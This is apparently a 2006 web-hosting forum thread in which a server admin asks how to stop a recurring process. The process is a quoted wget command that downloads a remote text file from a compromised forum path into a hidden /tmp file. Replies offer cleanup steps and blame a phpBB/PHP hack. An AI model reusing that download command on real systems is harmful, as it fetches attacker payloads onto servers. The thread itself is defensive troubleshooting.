LinkBack URL
About LinkBacksI have this running or trying to:
wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791
I kill it from WHM but it comes right back. How can I kill it DEAD and block it, It is bogging down the server.
Kill PID
I have this running or trying to:
wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791
I kill it from WHM but it comes right back. How can I kill it DEAD and block it, It is bogging down the server.
it's probably one of your users cron jobs delete the cron
Last edited by dalem; 04-11-2006 at 03:20 PM.
Lowest Host/Empire Technology LLC
Affordable hosting solutions http://empire-hosting.net
List Your hosting site FREE in http://hostgeneration.com
chmod 0000 /usr/bin/wget
to start with
then kill any process associated with wget or any /tmp/* files
then cd /tmp and remove any odd looking files
once you get things cleaned up then chmod 0700 /usr/bin/wget
I am sure there is several more steps that could be added here but I was up all night fixing a courier-pop issue so a little brain dead tonight
It's some kind of shell hack to run perl process..
I saw the same thing today on one of our servers. Also, look for a process running by nobody such as /usr/sbin/apache2 or /usr/sbin/apache with a perl process hogging the cpu..
I believe it's a phpbb hack, not sure what it's doing? I have not found the exact source, so I'm going through all phpbb installations on the server.
Last edited by Brad; 04-12-2006 at 02:09 AM.
Thanks
Thanks Dave,
I did just what you said and it worked great.
I told my customers to up grade all php. One got hacked by the Turkish Hacker. It was a php hack.
Thanks
Reply With Quote